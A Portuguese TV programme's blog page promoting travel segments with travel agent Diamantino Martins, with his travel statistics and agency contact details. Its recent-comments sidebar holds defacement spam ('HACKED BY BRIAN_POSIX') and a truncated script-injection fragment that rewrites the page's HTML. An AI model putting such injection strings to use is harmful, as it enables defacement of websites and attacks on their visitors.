Diamantino Martins vem contar-nos tudo sobre as suas aventuras e experiências na "Ilha de Margarita", e como sempre muito bem acompanhado... Não perca tudo sobre esta viagem no Mais Mulher desta quinta-feira.


Tags:

Foi em Maio de 2002 que vivi esta aventura com duas grandes amigas – a Bárbara Elias e a Sandra Cóias.

 

Na altura, durante um jantar em minha casa, a Bárbara e a Sandra disseram-me que queriam viajar as duas e quando eu fosse a algum sítio engraçado para lhes dizer que elas alinhariam comigo. Ainda nessa noite, e em grande excitação, decidimos ir os três fazer um cruzeiro pelas Caraíbas.

 

O destino seria sempre este, o que por si só já era um atractivo, tal como as companheiras de viagem, e em 15 dias estávamos a caminho de Puerto Rico.

 


Tags:

Diamantino Martins é o Homem que vai partilhar viagens incríveis connosco, e traz sempre consigo um rosto bem familiar!

 

Diogo Morgado, é o convidado de hoje e estará connosco, para nos revelar se para além de um actor brilhante, se envolve de corpo e alma nestes roteiros! Descubra como foi a viagem à América do Sul.

 


Tags:

“Aos 20 anos, 1988, iniciei-me como viajante e fui para Londres fazer um curso intensivo de Inglês durante um mês. Durante a minha estadia nesta cidade percebi que o que eu queria da vida era continuar a viajar. Aquela cidade parecia saída de outro planeta, parecia mesmo que tinha o mundo todo enfiado lá dentro.

 

Cheguei a pensar que Comissário de Bordo seria a saída mais fácil para viajar, mas com a faculdade terminada e 2 anos a trabalhar no ramo das bebidas, em 1996 abri a PÓLIS VIAGENS e nestes 15 anos dedicados ao Turismo a construir a minha própria história, a construir um património cultural que não deixarei de herança a ninguém mas que me faz feliz.

 

Costumo dizer que viajar é uma forma diferente de educação e nesse sentido sinto-me numa Universidade a fazer uma licenciatura sem fim. Tenho contabilizando todas as minhas viagens numa tabela de Excel, o que dá alguns números interessantes ao fim destes 15 anos. 2.924 horas no ar, o que a dividir por 24 horas dá quase 122 dias a voar ininterruptamente. 1.675 dias fora de Portugal, o que dividido por 365 dias dá 4,6 anos ou 55,9 meses de ausência. Já dormi em cerca de 420 hotéis diferentes distribuídos pelos quase 100 países/ilhas visitados nos cinco cantos do mundo.”

 

Contacto:

 

Diamantino Martins

PÓLIS VIAGENS

Av Berna Nº 4 – 1º Dto

1050-040 Lisboa

Tel: 21797 26 58 / 75

diamantino.martins@polis.pt

polis@polis.pt



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO